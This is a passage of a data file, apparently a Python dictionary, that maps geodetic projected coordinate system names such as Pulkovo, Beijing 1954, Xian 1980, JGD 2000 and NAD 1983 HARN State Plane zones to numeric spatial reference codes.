'Xian_1980_GK_Zone_20': 2334, 'Xian_1980_GK_Zone_21': 2335, 'Xian_1980_GK_Zone_22': 2336, 'Xian_1980_GK_Zone_23': 2337, 'Xian_1980_GK_CM_75E': 2338, 'Xian_1980_GK_CM_81E': 2339, 'Xian_1980_GK_CM_87E': 2340, 'Xian_1980_GK_CM_93E': 2341, 'Xian_1980_GK_CM_99E': 2342, 'Xian_1980_GK_CM_105E': 2343, 'Xian_1980_GK_CM_111E': 2344, 'Xian_1980_GK_CM_117E': 2345, 'Xian_1980_GK_CM_123E': 2346, 'Xian_1980_GK_CM_129E': 2347, 'Xian_1980_GK_CM_135E': 2348, 'Xian_1980_3_Degree_GK_Zone_25': 2349, 'Xian_1980_3_Degree_GK_Zone_26': 2350, 'Xian_1980_3_Degree_GK_Zone_27': 2351, 'Xian_1980_3_Degree_GK_Zone_28': 2352, 'Xian_1980_3_Degree_GK_Zone_29': 2353, 'Xian_1980_3_Degree_GK_Zone_30': 2354, 'Xian_1980_3_Degree_GK_Zone_31': 2355, 'Xian_1980_3_Degree_GK_Zone_32': 2356, 'Xian_1980_3_Degree_GK_Zone_33': 2357, 'Xian_1980_3_Degree_GK_Zone_34': 2358, 'Xian_1980_3_Degree_GK_Zone_35': 2359, 'Xian_1980_3_Degree_GK_Zone_36': 2360, 'Xian_1980_3_Degree_GK_Zone_37': 2361, 'Xian_1980_3_Degree_GK_Zone_38': 2362, 'Xian_1980_3_Degree_GK_Zone_39': 2363, 'Xian_1980_3_Degree_GK_Zone_40': 2364, 'Xian_1980_3_Degree_GK_Zone_41': 2365, 'Xian_1980_3_Degree_GK_Zone_42': 2366, 'Xian_1980_3_Degree_GK_Zone_43': 2367, 'Xian_1980_3_Degree_GK_Zone_44': 2368, 'Xian_1980_3_Degree_GK_Zone_45': 2369, 
'Xian_1980_3_Degree_GK_CM_75E': 2370, 'Xian_1980_3_Degree_GK_CM_78E': 2371, 'Xian_1980_3_Degree_GK_CM_81E': 2372, 'Xian_1980_3_Degree_GK_CM_84E': 2373, 'Xian_1980_3_Degree_GK_CM_87E': 2374, 'Xian_1980_3_Degree_GK_CM_90E': 2375, 'Xian_1980_3_Degree_GK_CM_93E': 2376, 'Xian_1980_3_Degree_GK_CM_96E': 2377, 'Xian_1980_3_Degree_GK_CM_99E': 2378, 'Xian_1980_3_Degree_GK_CM_102E': 2379, 'Xian_1980_3_Degree_GK_CM_105E': 2380, 'Xian_1980_3_Degree_GK_CM_108E': 2381, 'Xian_1980_3_Degree_GK_CM_111E': 2382, 'Xian_1980_3_Degree_GK_CM_114E': 2383, 'Xian_1980_3_Degree_GK_CM_117E': 2384, 'Xian_1980_3_Degree_GK_CM_120E': 2385, 'Xian_1980_3_Degree_GK_CM_123E': 2386, 'Xian_1980_3_Degree_GK_CM_126E': 2387, 'Xian_1980_3_Degree_GK_CM_129E': 2388, 'Xian_1980_3_Degree_GK_CM_132E': 2389, 'Xian_1980_3_Degree_GK_CM_135E': 2390, 'Finland_Zone_1': 2391, 'Finland_Zone_2': 2392, 'Finland_Zone_3': 2393, 'Finland_Zone_4': 2394, 'South_Yemen_GK_Zone_8': 2395, 'South_Yemen_GK_Zone_9': 2396, 'Pulkovo_1942_Adj_1983_3_Degree_GK_Zone_3': 2397, 'Pulkovo_1942_Adj_1983_3_Degree_GK_Zone_4': 2398, 'Pulkovo_1942_Adj_1983_3_Degree_GK_Zone_5': 2399, 'RT90_25_gon_W': 2400, 'Beijing_1954_3_Degree_GK_Zone_25': 2401, 'Beijing_1954_3_Degree_GK_Zone_26': 2402, 'Beijing_1954_3_Degree_GK_Zone_27': 2403, 'Beijing_1954_3_Degree_GK_Zone_28': 2404, 'Beijing_1954_3_Degree_GK_Zone_29': 2405, 'Beijing_1954_3_Degree_GK_Zone_30': 2406, 'Beijing_1954_3_Degree_GK_Zone_31': 2407, 'Beijing_1954_3_Degree_GK_Zone_32': 2408, 'Beijing_1954_3_Degree_GK_Zone_33': 2409, 'Beijing_1954_3_Degree_GK_Zone_34': 2410, 'Beijing_1954_3_Degree_GK_Zone_35': 2411, 'Beijing_1954_3_Degree_GK_Zone_36': 2412, 'Beijing_1954_3_Degree_GK_Zone_37': 2413, 'Beijing_1954_3_Degree_GK_Zone_38': 2414, 'Beijing_1954_3_Degree_GK_Zone_39': 2415, 'Beijing_1954_3_Degree_GK_Zone_40': 2416, 'Beijing_1954_3_Degree_GK_Zone_41': 2417, 'Beijing_1954_3_Degree_GK_Zone_42': 2418, 'Beijing_1954_3_Degree_GK_Zone_43': 2419, 'Beijing_1954_3_Degree_GK_Zone_44': 2420, 
'Beijing_1954_3_Degree_GK_Zone_45': 2421, 'Beijing_1954_3_Degree_GK_CM_75E': 2422, 'Beijing_1954_3_Degree_GK_CM_78E': 2423, 'Beijing_1954_3_Degree_GK_CM_81E': 2424, 'Beijing_1954_3_Degree_GK_CM_84E': 2425, 'Beijing_1954_3_Degree_GK_CM_87E': 2426, 'Beijing_1954_3_Degree_GK_CM_90E': 2427, 'Beijing_1954_3_Degree_GK_CM_93E': 2428, 'Beijing_1954_3_Degree_GK_CM_96E': 2429, 'Beijing_1954_3_Degree_GK_CM_99E': 2430, 'Beijing_1954_3_Degree_GK_CM_102E': 2431, 'Beijing_1954_3_Degree_GK_CM_105E': 2432, 'Beijing_1954_3_Degree_GK_CM_108E': 2433, 'Beijing_1954_3_Degree_GK_CM_111E': 2434, 'Beijing_1954_3_Degree_GK_CM_114E': 2435, 'Beijing_1954_3_Degree_GK_CM_117E': 2436, 'Beijing_1954_3_Degree_GK_CM_120E': 2437, 'Beijing_1954_3_Degree_GK_CM_123E': 2438, 'Beijing_1954_3_Degree_GK_CM_126E': 2439, 'Beijing_1954_3_Degree_GK_CM_129E': 2440, 'Beijing_1954_3_Degree_GK_CM_132E': 2441, 'Beijing_1954_3_Degree_GK_CM_135E': 2442, 'JGD_2000_Japan_Zone_1': 2443, 'JGD_2000_Japan_Zone_2': 2444, 'JGD_2000_Japan_Zone_3': 2445, 'JGD_2000_Japan_Zone_4': 2446, 'JGD_2000_Japan_Zone_5': 2447, 'JGD_2000_Japan_Zone_6': 2448, 'JGD_2000_Japan_Zone_7': 2449, 'JGD_2000_Japan_Zone_8': 2450, 'JGD_2000_Japan_Zone_9': 2451, 'JGD_2000_Japan_Zone_10': 2452, 'JGD_2000_Japan_Zone_11': 2453, 'JGD_2000_Japan_Zone_12': 2454, 'JGD_2000_Japan_Zone_13': 2455, 'JGD_2000_Japan_Zone_14': 2456, 'JGD_2000_Japan_Zone_15': 2457, 'JGD_2000_Japan_Zone_16': 2458, 'JGD_2000_Japan_Zone_17': 2459, 'JGD_2000_Japan_Zone_18': 2460, 'JGD_2000_Japan_Zone_19': 2461, 'Albanian_1987_GK_Zone_4': 2462, 'Pulkovo_1942_3_Degree_GK_Zone_7': 2523, 'Pulkovo_1942_3_Degree_GK_Zone_8': 2524, 'Pulkovo_1942_3_Degree_GK_Zone_9': 2525, 'Pulkovo_1942_3_Degree_GK_Zone_10': 2526, 'Pulkovo_1942_3_Degree_GK_Zone_11': 2527, 'Pulkovo_1942_3_Degree_GK_Zone_12': 2528, 'Pulkovo_1942_3_Degree_GK_Zone_13': 2529, 'Pulkovo_1942_3_Degree_GK_Zone_14': 2530, 'Pulkovo_1942_3_Degree_GK_Zone_15': 2531, 'Pulkovo_1942_3_Degree_GK_Zone_16': 2532, 'Pulkovo_1942_3_Degree_GK_Zone_17': 
2533, 'Pulkovo_1942_3_Degree_GK_Zone_18': 2534, 'Pulkovo_1942_3_Degree_GK_Zone_19': 2535, 'Pulkovo_1942_3_Degree_GK_Zone_20': 2536, 'Pulkovo_1942_3_Degree_GK_Zone_21': 2537, 'Pulkovo_1942_3_Degree_GK_Zone_22': 2538, 'Pulkovo_1942_3_Degree_GK_Zone_23': 2539, 'Pulkovo_1942_3_Degree_GK_Zone_24': 2540, 'Pulkovo_1942_3_Degree_GK_Zone_25': 2541, 'Pulkovo_1942_3_Degree_GK_Zone_26': 2542, 'Pulkovo_1942_3_Degree_GK_Zone_27': 2543, 'Pulkovo_1942_3_Degree_GK_Zone_28': 2544, 'Pulkovo_1942_3_Degree_GK_Zone_29': 2545, 'Pulkovo_1942_3_Degree_GK_Zone_30': 2546, 'Pulkovo_1942_3_Degree_GK_Zone_31': 2547, 'Pulkovo_1942_3_Degree_GK_Zone_32': 2548, 'Pulkovo_1942_3_Degree_GK_Zone_33': 2549, 'Samboja_UTM_Zone_50S': 2550, 'Pulkovo_1942_3_Degree_GK_Zone_34': 2551, 'Pulkovo_1942_3_Degree_GK_Zone_35': 2552, 'Pulkovo_1942_3_Degree_GK_Zone_36': 2553, 'Pulkovo_1942_3_Degree_GK_Zone_37': 2554, 'Pulkovo_1942_3_Degree_GK_Zone_38': 2555, 'Pulkovo_1942_3_Degree_GK_Zone_39': 2556, 'Pulkovo_1942_3_Degree_GK_Zone_40': 2557, 'Pulkovo_1942_3_Degree_GK_Zone_41': 2558, 'Pulkovo_1942_3_Degree_GK_Zone_42': 2559, 'Pulkovo_1942_3_Degree_GK_Zone_43': 2560, 'Pulkovo_1942_3_Degree_GK_Zone_44': 2561, 'Pulkovo_1942_3_Degree_GK_Zone_45': 2562, 'Pulkovo_1942_3_Degree_GK_Zone_46': 2563, 'Pulkovo_1942_3_Degree_GK_Zone_47': 2564, 'Pulkovo_1942_3_Degree_GK_Zone_48': 2565, 'Pulkovo_1942_3_Degree_GK_Zone_49': 2566, 'Pulkovo_1942_3_Degree_GK_Zone_50': 2567, 'Pulkovo_1942_3_Degree_GK_Zone_51': 2568, 'Pulkovo_1942_3_Degree_GK_Zone_52': 2569, 'Pulkovo_1942_3_Degree_GK_Zone_53': 2570, 'Pulkovo_1942_3_Degree_GK_Zone_54': 2571, 'Pulkovo_1942_3_Degree_GK_Zone_55': 2572, 'Pulkovo_1942_3_Degree_GK_Zone_56': 2573, 'Pulkovo_1942_3_Degree_GK_Zone_57': 2574, 'Pulkovo_1942_3_Degree_GK_Zone_58': 2575, 'Pulkovo_1942_3_Degree_GK_Zone_59': 2576, 'Pulkovo_1942_3_Degree_GK_Zone_60': 2577, 'Pulkovo_1942_3_Degree_GK_Zone_61': 2578, 'Pulkovo_1942_3_Degree_GK_Zone_62': 2579, 'Pulkovo_1942_3_Degree_GK_Zone_63': 2580, 
'Pulkovo_1942_3_Degree_GK_Zone_64': 2581, 'Pulkovo_1942_3_Degree_GK_CM_21E': 2582, 'Pulkovo_1942_3_Degree_GK_CM_24E': 2583, 'Pulkovo_1942_3_Degree_GK_CM_27E': 2584, 'Pulkovo_1942_3_Degree_GK_CM_30E': 2585, 'Pulkovo_1942_3_Degree_GK_CM_33E': 2586, 'Pulkovo_1942_3_Degree_GK_CM_36E': 2587, 'Pulkovo_1942_3_Degree_GK_CM_39E': 2588, 'Pulkovo_1942_3_Degree_GK_CM_42E': 2589, 'Pulkovo_1942_3_Degree_GK_CM_45E': 2590, 'Pulkovo_1942_3_Degree_GK_CM_48E': 2591, 'Pulkovo_1942_3_Degree_GK_CM_51E': 2592, 'Pulkovo_1942_3_Degree_GK_CM_54E': 2593, 'Pulkovo_1942_3_Degree_GK_CM_57E': 2594, 'Pulkovo_1942_3_Degree_GK_CM_60E': 2595, 'Pulkovo_1942_3_Degree_GK_CM_63E': 2596, 'Pulkovo_1942_3_Degree_GK_CM_66E': 2597, 'Pulkovo_1942_3_Degree_GK_CM_69E': 2598, 'Pulkovo_1942_3_Degree_GK_CM_72E': 2599, 'Lietuvos_Koordinaciu_Sistema': 2600, 'Pulkovo_1942_3_Degree_GK_CM_75E': 2601, 'Pulkovo_1942_3_Degree_GK_CM_78E': 2602, 'Pulkovo_1942_3_Degree_GK_CM_81E': 2603, 'Pulkovo_1942_3_Degree_GK_CM_84E': 2604, 'Pulkovo_1942_3_Degree_GK_CM_87E': 2605, 'Pulkovo_1942_3_Degree_GK_CM_90E': 2606, 'Pulkovo_1942_3_Degree_GK_CM_93E': 2607, 'Pulkovo_1942_3_Degree_GK_CM_96E': 2608, 'Pulkovo_1942_3_Degree_GK_CM_99E': 2609, 'Pulkovo_1942_3_Degree_GK_CM_102E': 2610, 'Pulkovo_1942_3_Degree_GK_CM_105E': 2611, 'Pulkovo_1942_3_Degree_GK_CM_108E': 2612, 'Pulkovo_1942_3_Degree_GK_CM_111E': 2613, 'Pulkovo_1942_3_Degree_GK_CM_114E': 2614, 'Pulkovo_1942_3_Degree_GK_CM_117E': 2615, 'Pulkovo_1942_3_Degree_GK_CM_120E': 2616, 'Pulkovo_1942_3_Degree_GK_CM_123E': 2617, 'Pulkovo_1942_3_Degree_GK_CM_126E': 2618, 'Pulkovo_1942_3_Degree_GK_CM_129E': 2619, 'Pulkovo_1942_3_Degree_GK_CM_132E': 2620, 'Pulkovo_1942_3_Degree_GK_CM_135E': 2621, 'Pulkovo_1942_3_Degree_GK_CM_138E': 2622, 'Pulkovo_1942_3_Degree_GK_CM_141E': 2623, 'Pulkovo_1942_3_Degree_GK_CM_144E': 2624, 'Pulkovo_1942_3_Degree_GK_CM_147E': 2625, 'Pulkovo_1942_3_Degree_GK_CM_150E': 2626, 'Pulkovo_1942_3_Degree_GK_CM_153E': 2627, 'Pulkovo_1942_3_Degree_GK_CM_156E': 2628, 
'Pulkovo_1942_3_Degree_GK_CM_159E': 2629, 'Pulkovo_1942_3_Degree_GK_CM_162E': 2630, 'Pulkovo_1942_3_Degree_GK_CM_165E': 2631, 'Pulkovo_1942_3_Degree_GK_CM_168E': 2632, 'Pulkovo_1942_3_Degree_GK_CM_171E': 2633, 'Pulkovo_1942_3_Degree_GK_CM_174E': 2634, 'Pulkovo_1942_3_Degree_GK_CM_177E': 2635, 'Pulkovo_1942_3_Degree_GK_CM_180E': 2636, 'Pulkovo_1942_3_Degree_GK_CM_177W': 2637, 'Pulkovo_1942_3_Degree_GK_CM_174W': 2638, 'Pulkovo_1942_3_Degree_GK_CM_171W': 2639, 'Pulkovo_1942_3_Degree_GK_CM_168W': 2640, 'Pulkovo_1995_3_Degree_GK_Zone_7': 2641, 'Pulkovo_1995_3_Degree_GK_Zone_8': 2642, 'Pulkovo_1995_3_Degree_GK_Zone_9': 2643, 'Pulkovo_1995_3_Degree_GK_Zone_10': 2644, 'Pulkovo_1995_3_Degree_GK_Zone_11': 2645, 'Pulkovo_1995_3_Degree_GK_Zone_12': 2646, 'Pulkovo_1995_3_Degree_GK_Zone_13': 2647, 'Pulkovo_1995_3_Degree_GK_Zone_14': 2648, 'Pulkovo_1995_3_Degree_GK_Zone_15': 2649, 'Pulkovo_1995_3_Degree_GK_Zone_16': 2650, 'Pulkovo_1995_3_Degree_GK_Zone_17': 2651, 'Pulkovo_1995_3_Degree_GK_Zone_18': 2652, 'Pulkovo_1995_3_Degree_GK_Zone_19': 2653, 'Pulkovo_1995_3_Degree_GK_Zone_20': 2654, 'Pulkovo_1995_3_Degree_GK_Zone_21': 2655, 'Pulkovo_1995_3_Degree_GK_Zone_22': 2656, 'Pulkovo_1995_3_Degree_GK_Zone_23': 2657, 'Pulkovo_1995_3_Degree_GK_Zone_24': 2658, 'Pulkovo_1995_3_Degree_GK_Zone_25': 2659, 'Pulkovo_1995_3_Degree_GK_Zone_26': 2660, 'Pulkovo_1995_3_Degree_GK_Zone_27': 2661, 'Pulkovo_1995_3_Degree_GK_Zone_28': 2662, 'Pulkovo_1995_3_Degree_GK_Zone_29': 2663, 'Pulkovo_1995_3_Degree_GK_Zone_30': 2664, 'Pulkovo_1995_3_Degree_GK_Zone_31': 2665, 'Pulkovo_1995_3_Degree_GK_Zone_32': 2666, 'Pulkovo_1995_3_Degree_GK_Zone_33': 2667, 'Pulkovo_1995_3_Degree_GK_Zone_34': 2668, 'Pulkovo_1995_3_Degree_GK_Zone_35': 2669, 'Pulkovo_1995_3_Degree_GK_Zone_36': 2670, 'Pulkovo_1995_3_Degree_GK_Zone_37': 2671, 'Pulkovo_1995_3_Degree_GK_Zone_38': 2672, 'Pulkovo_1995_3_Degree_GK_Zone_39': 2673, 'Pulkovo_1995_3_Degree_GK_Zone_40': 2674, 'Pulkovo_1995_3_Degree_GK_Zone_41': 2675, 
'Pulkovo_1995_3_Degree_GK_Zone_42': 2676, 'Pulkovo_1995_3_Degree_GK_Zone_43': 2677, 'Pulkovo_1995_3_Degree_GK_Zone_44': 2678, 'Pulkovo_1995_3_Degree_GK_Zone_45': 2679, 'Pulkovo_1995_3_Degree_GK_Zone_46': 2680, 'Pulkovo_1995_3_Degree_GK_Zone_47': 2681, 'Pulkovo_1995_3_Degree_GK_Zone_48': 2682, 'Pulkovo_1995_3_Degree_GK_Zone_49': 2683, 'Pulkovo_1995_3_Degree_GK_Zone_50': 2684, 'Pulkovo_1995_3_Degree_GK_Zone_51': 2685, 'Pulkovo_1995_3_Degree_GK_Zone_52': 2686, 'Pulkovo_1995_3_Degree_GK_Zone_53': 2687, 'Pulkovo_1995_3_Degree_GK_Zone_54': 2688, 'Pulkovo_1995_3_Degree_GK_Zone_55': 2689, 'Pulkovo_1995_3_Degree_GK_Zone_56': 2690, 'Pulkovo_1995_3_Degree_GK_Zone_57': 2691, 'Pulkovo_1995_3_Degree_GK_Zone_58': 2692, 'Pulkovo_1995_3_Degree_GK_Zone_59': 2693, 'Pulkovo_1995_3_Degree_GK_Zone_60': 2694, 'Pulkovo_1995_3_Degree_GK_Zone_61': 2695, 'Pulkovo_1995_3_Degree_GK_Zone_62': 2696, 'Pulkovo_1995_3_Degree_GK_Zone_63': 2697, 'Pulkovo_1995_3_Degree_GK_Zone_64': 2698, 'Pulkovo_1995_3_Degree_GK_CM_21E': 2699, 'Pulkovo_1995_3_Degree_GK_CM_24E': 2700, 'Pulkovo_1995_3_Degree_GK_CM_27E': 2701, 'Pulkovo_1995_3_Degree_GK_CM_30E': 2702, 'Pulkovo_1995_3_Degree_GK_CM_33E': 2703, 'Pulkovo_1995_3_Degree_GK_CM_36E': 2704, 'Pulkovo_1995_3_Degree_GK_CM_39E': 2705, 'Pulkovo_1995_3_Degree_GK_CM_42E': 2706, 'Pulkovo_1995_3_Degree_GK_CM_45E': 2707, 'Pulkovo_1995_3_Degree_GK_CM_48E': 2708, 'Pulkovo_1995_3_Degree_GK_CM_51E': 2709, 'Pulkovo_1995_3_Degree_GK_CM_54E': 2710, 'Pulkovo_1995_3_Degree_GK_CM_57E': 2711, 'Pulkovo_1995_3_Degree_GK_CM_60E': 2712, 'Pulkovo_1995_3_Degree_GK_CM_63E': 2713, 'Pulkovo_1995_3_Degree_GK_CM_66E': 2714, 'Pulkovo_1995_3_Degree_GK_CM_69E': 2715, 'Pulkovo_1995_3_Degree_GK_CM_72E': 2716, 'Pulkovo_1995_3_Degree_GK_CM_75E': 2717, 'Pulkovo_1995_3_Degree_GK_CM_78E': 2718, 'Pulkovo_1995_3_Degree_GK_CM_81E': 2719, 'Pulkovo_1995_3_Degree_GK_CM_84E': 2720, 'Pulkovo_1995_3_Degree_GK_CM_87E': 2721, 'Pulkovo_1995_3_Degree_GK_CM_90E': 2722, 'Pulkovo_1995_3_Degree_GK_CM_93E': 2723, 
'Pulkovo_1995_3_Degree_GK_CM_96E': 2724, 'Pulkovo_1995_3_Degree_GK_CM_99E': 2725, 'Pulkovo_1995_3_Degree_GK_CM_102E': 2726, 'Pulkovo_1995_3_Degree_GK_CM_105E': 2727, 'Pulkovo_1995_3_Degree_GK_CM_108E': 2728, 'Pulkovo_1995_3_Degree_GK_CM_111E': 2729, 'Pulkovo_1995_3_Degree_GK_CM_114E': 2730, 'Pulkovo_1995_3_Degree_GK_CM_117E': 2731, 'Pulkovo_1995_3_Degree_GK_CM_120E': 2732, 'Pulkovo_1995_3_Degree_GK_CM_123E': 2733, 'Pulkovo_1995_3_Degree_GK_CM_126E': 2734, 'Pulkovo_1995_3_Degree_GK_CM_129E': 2735, 'Tete_UTM_Zone_36S': 2736, 'Tete_UTM_Zone_37S': 2737, 'Pulkovo_1995_3_Degree_GK_CM_132E': 2738, 'Pulkovo_1995_3_Degree_GK_CM_135E': 2739, 'Pulkovo_1995_3_Degree_GK_CM_138E': 2740, 'Pulkovo_1995_3_Degree_GK_CM_141E': 2741, 'Pulkovo_1995_3_Degree_GK_CM_144E': 2742, 'Pulkovo_1995_3_Degree_GK_CM_147E': 2743, 'Pulkovo_1995_3_Degree_GK_CM_150E': 2744, 'Pulkovo_1995_3_Degree_GK_CM_153E': 2745, 'Pulkovo_1995_3_Degree_GK_CM_156E': 2746, 'Pulkovo_1995_3_Degree_GK_CM_159E': 2747, 'Pulkovo_1995_3_Degree_GK_CM_162E': 2748, 'Pulkovo_1995_3_Degree_GK_CM_165E': 2749, 'Pulkovo_1995_3_Degree_GK_CM_168E': 2750, 'Pulkovo_1995_3_Degree_GK_CM_171E': 2751, 'Pulkovo_1995_3_Degree_GK_CM_174E': 2752, 'Pulkovo_1995_3_Degree_GK_CM_177E': 2753, 'Pulkovo_1995_3_Degree_GK_CM_180E': 2754, 'Pulkovo_1995_3_Degree_GK_CM_177W': 2755, 'Pulkovo_1995_3_Degree_GK_CM_174W': 2756, 'Pulkovo_1995_3_Degree_GK_CM_171W': 2757, 'Pulkovo_1995_3_Degree_GK_CM_168W': 2758, 'NAD_1983_HARN_StatePlane_Alabama_East_FIPS_0101': 2759, 'NAD_1983_HARN_StatePlane_Alabama_West_FIPS_0102': 2760, 'NAD_1983_HARN_StatePlane_Arizona_East_FIPS_0201': 2761, 'NAD_1983_HARN_StatePlane_Arizona_Central_FIPS_0202': 2762, 'NAD_1983_HARN_StatePlane_Arizona_West_FIPS_0203': 2763, 'NAD_1983_HARN_StatePlane_Arkansas_North_FIPS_0301': 2764, 'NAD_1983_HARN_StatePlane_Arkansas_South_FIPS_0302': 2765, 'NAD_1983_HARN_StatePlane_California_I_FIPS_0401': 2766, 'NAD_1983_HARN_StatePlane_California_II_FIPS_0402': 2767, 
'NAD_1983_HARN_StatePlane_California_III_FIPS_0403': 2768, 'NAD_1983_HARN_StatePlane_California_IV_FIPS_0404': 2769, 'NAD_1983_HARN_StatePlane_California_V_FIPS_0405': 2770, 'NAD_1983_HARN_StatePlane_California_VI_FIPS_0406': 2771, 'NAD_1983_HARN_StatePlane_Colorado_North_FIPS_0501': 2772, 'NAD_1983_HARN_StatePlane_Colorado_Central_FIPS_0502': 2773, 'NAD_1983_HARN_StatePlane_Colorado_South_FIPS_0503': 2774, 'NAD_1983_HARN_StatePlane_Connecticut_FIPS_0600': 2775, 'NAD_1983_HARN_StatePlane_Delaware_FIPS_0700': 2776, 'NAD_1983_HARN_StatePlane_Florida_East_FIPS_0901': 2777, 'NAD_1983_HARN_StatePlane_Florida_West_FIPS_0902': 2778, 'NAD_1983_HARN_StatePlane_Florida_North_FIPS_0903': 2779, 'NAD_1983_HARN_StatePlane_Georgia_East_FIPS_1001': 2780, 'NAD_1983_HARN_StatePlane_Georgia_West_FIPS_1002': 2781, 'NAD_1983_HARN_StatePlane_Hawaii_1_FIPS_5101': 2782, 'NAD_1983_HARN_StatePlane_Hawaii_2_FIPS_5102': 2783, 'NAD_1983_HARN_StatePlane_Hawaii_3_FIPS_5103': 2784, 'NAD_1983_HARN_StatePlane_Hawaii_4_FIPS_5104': 2785, 'NAD_1983_HARN_StatePlane_Hawaii_5_FIPS_5105': 2786, 'NAD_1983_HARN_StatePlane_Idaho_East_FIPS_1101': 2787, 'NAD_1983_HARN_StatePlane_Idaho_Central_FIPS_1102': 2788, 'NAD_1983_HARN_StatePlane_Idaho_West_FIPS_1103': 2789, 'NAD_1983_HARN_StatePlane_Illinois_East_FIPS_1201': 2790, 'NAD_1983_HARN_StatePlane_Illinois_West_FIPS_1202': 2791, 'NAD_1983_HARN_StatePlane_Indiana_East_FIPS_1301': 2792, 'NAD_1983_HARN_StatePlane_Indiana_West_FIPS_1302': 2793, 'NAD_1983_HARN_StatePlane_Iowa_North_FIPS_1401': 2794, 'NAD_1983_HARN_StatePlane_Iowa_South_FIPS_1402': 2795, 'NAD_1983_HARN_StatePlane_Kansas_North_FIPS_1501': 2796, 'NAD_1983_HARN_StatePlane_Kansas_South_FIPS_1502': 2797, 'NAD_1983_HARN_StatePlane_Kentucky_North_FIPS_1601': 2798, 'NAD_1983_HARN_StatePlane_Kentucky_South_FIPS_1602': 2799, 'NAD_1983_HARN_StatePlane_Louisiana_North_FIPS_1701': 2800, 'NAD_1983_HARN_StatePlane_Louisiana_South_FIPS_1702': 2801, 'NAD_1983_HARN_StatePlane_Maine_East_FIPS_1801': 2802, 
'NAD_1983_HARN_StatePlane_Maine_West_FIPS_1802': 2803, 'NAD_1983_HARN_StatePlane_Maryland_FIPS_1900': 2804, 'NAD_1983_HARN_StatePlane_Massachusetts_Mainland_FIPS_2001': 2805, 'NAD_1983_HARN_StatePlane_Massachusetts_Island_FIPS_2002': 2806, 'NAD_1983_HARN_StatePlane_Michigan_North_FIPS_2111': 2807, 'NAD_1983_HARN_StatePlane_Michigan_Central_FIPS_2112': 2808, 'NAD_1983_HARN_StatePlane_Michigan_South_FIPS_2113': 2809, 'NAD_1983_HARN_StatePlane_Minnesota_North_FIPS_2201': 2810, 'NAD_1983_HARN_StatePlane_Minnesota_Central_FIPS_2202': 2811, 'NAD_1983_HARN_StatePlane_Minnesota_South_FIPS_2203': 2812, 'NAD_1983_HARN_StatePlane_Mississippi_East_FIPS_2301': 2813, 'NAD_1983_HARN_StatePlane_Mississippi_West_FIPS_2302': 2814, 'NAD_1983_HARN_StatePlane_Missouri_East_FIPS_2401': 2815, 'NAD_1983_HARN_StatePlane_Missouri_Central_FIPS_2402': 2816, 'NAD_1983_HARN_StatePlane_Missouri_West_FIPS_2403': 2817, 'NAD_1983_HARN_StatePlane_Montana_FIPS_2500': 2818, 'NAD_1983_HARN_StatePlane_Nebraska_FIPS_2600': 2819, 'NAD_1983_HARN_StatePlane_Nevada_East_FIPS_2701': 2820, 'NAD_1983_HARN_StatePlane_Nevada_Central_FIPS_2702': 2821, 'NAD_1983_HARN_StatePlane_Nevada_West_FIPS_2703': 2822, 'NAD_1983_HARN_StatePlane_New_Hampshire_FIPS_2800': 2823, 'NAD_1983_HARN_StatePlane_New_Jersey_FIPS_2900': 2824, 'NAD_1983_HARN_StatePlane_New_Mexico_East_FIPS_3001': 2825, 'NAD_1983_HARN_StatePlane_New_Mexico_Central_FIPS_3002': 2826, 'NAD_1983_HARN_StatePlane_New_Mexico_West_FIPS_3003': 2827, 'NAD_1983_HARN_StatePlane_New_York_East_FIPS_3101': 2828, 'NAD_1983_HARN_StatePlane_New_York_Central_FIPS_3102': 2829, 'NAD_1983_HARN_StatePlane_New_York_West_FIPS_3103': 2830, 'NAD_1983_HARN_StatePlane_New_York_Long_Island_FIPS_3104': 2831, 'NAD_1983_HARN_StatePlane_North_Dakota_North_FIPS_3301': 2832, 'NAD_1983_HARN_StatePlane_North_Dakota_South_FIPS_3302': 2833, 'NAD_1983_HARN_StatePlane_Ohio_North_FIPS_3401': 2834, 'NAD_1983_HARN_StatePlane_Ohio_South_FIPS_3402': 2835, 
'NAD_1983_HARN_StatePlane_Oklahoma_North_FIPS_3501': 2836, 'NAD_1983_HARN_StatePlane_Oklahoma_South_FIPS_3502': 2837, 'NAD_1983_HARN_StatePlane_Oregon_North_FIPS_3601': 2838, 'NAD_1983_HARN_StatePlane_Oregon_South_FIPS_3602': 2839, 'NAD_1983_HARN_StatePlane_Rhode_Island_FIPS_3800': 2840, 'NAD_1983_HARN_StatePlane_South_Dakota_North_FIPS_4001': 2841, 'NAD_1983_HARN_StatePlane_South_Dakota_South_FIPS_4002': 2842, 'NAD_1983_HARN_StatePlane_Tennessee_FIPS_4100': 2843, 'NAD_1983_HARN_StatePlane_Texas_North_FIPS_4201': 2844, 'NAD_1983_HARN_StatePlane_Texas_North_Central_FIPS_4202': 2845, 'NAD_1983_HARN_StatePlane_Texas_Central_FIPS_4203': 2846, 'NAD_1983_HARN_StatePlane_Texas_South_Central_FIPS_4204': 2847, 'NAD_1983_HARN_StatePlane_Texas_South_FIPS_4205': 2848, 'NAD_1983_HARN_StatePlane_Utah_North_FIPS_4301': 2849, 'NAD_1983_HARN_StatePlane_Utah_Central_FIPS_4302': 2850, 'NAD_1983_HARN_StatePlane_Utah_South_FIPS_4303': 2851, 'NAD_1983_HARN_StatePlane_Vermont_FIPS_4400': 2852, 'NAD_1983_HARN_StatePlane_Virginia_North_FIPS_4501': 2853, 'NAD_1983_HARN_StatePlane_Virginia_South_FIPS_4502': 2854, 'NAD_1983_HARN_StatePlane_Washington_North_FIPS_4601': 2855, 'NAD_1983_HARN_StatePlane_Washington_South_FIPS_4602': 2856, 'NAD_1983_HARN_StatePlane_West_Virginia_North_FIPS_4701': 2857, 'NAD_1983_HARN_StatePlane_West_Virginia_South_FIPS_4702': 2858, 'NAD_1983_HARN_StatePlane_Wisconsin_North_FIPS_4801': 2859, 'NAD_1983_HARN_StatePlane_Wisconsin_Central_FIPS_4802': 2860, 'NAD_1983_HARN_StatePlane_Wisconsin_South_FIPS_4803': 2861, 'NAD_1983_HARN_StatePlane_Wyoming_East_FIPS_4901': 2862, 'NAD_1983_HARN_StatePlane_Wyoming_East_Central_FIPS_4902': 2863, 'NAD_1983_HARN_StatePlane_Wyoming_West_Central_FIPS_4903': 2864, 'NAD_1983_HARN_StatePlane_Wyoming_West_FIPS_4904': 2865, 'NAD_1983_HARN_StatePlane_Puerto_Rico_Virgin_Islands_FIPS_5200': 2866, 'NAD_1983_HARN_StatePlane_Arizona_East_FIPS_0201_Feet_Intl': 2867, 'NAD_1983_HARN_StatePlane_Arizona_Central_FIPS_0202_Feet_Intl': 2868, 
